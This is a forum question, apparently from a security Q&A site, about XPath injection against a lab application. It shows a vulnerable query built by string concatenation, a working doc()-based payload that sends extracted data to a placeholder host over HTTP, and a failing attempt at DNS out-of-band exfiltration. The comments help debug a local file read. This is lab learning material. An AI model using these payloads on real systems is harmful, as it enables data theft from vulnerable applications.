# xpath injection and doc() function

Tags: injection

I'm trying to understand how to use the `doc()` function of xpath in several ways to carry out xpath injections

Lab's query:

```
 String xquery = "/root/books/book[contains(title/text(), '" + query + "')]";
```

I can use both versions 2.0 and 3.0

I'm able to extract data and export it through HTTP, for example:

```
test') and doc((concat('http://IP/data/?d=',(encode-for-uri((normalize-space((/*[1]/*[2]/*[2]/@*[2]))))))))/data=220248 and string('1'='1
```

But I'm not able to:

- Extract data and export it through DNS requests:

  `test') and doc((concat(name((/*[1])) , 'domain.com'))) and string('1'='1` -> it does not give any error, but nothing happens
- Read a local xml file (file's permissions are fine)
  @solved

What is wrong with my payloads?

Comment: Does the exploited process have privileges to read the `lubuntu` user's files?

Comment: @wireghoul thanks for your interest in helping me! the permissions of that file are 777, so anyone can read that file.  I also tried to move it to /tmp/test.xml, but the error still remains

Comment: Have you tried using the full path instead of a file uri? `doc('/tmp/test.xml')` ? If it still fails you'll need to debug what's going on, f.ex try running the vulnerable program under strace to see what file it tries to access and the error it gets

Comment: @wireghoul the problem was that the lab was running inside of a docker.. i'm an idiot, i did not figure it out ahah

Comment: regarding the oob via dns requests, i tried again for several hours.. but i can't understand why nothing happens. I tried also something very basic injection, like doc((concat('ABCTEST', '.domain.com' ))) and string('1'='1 but still..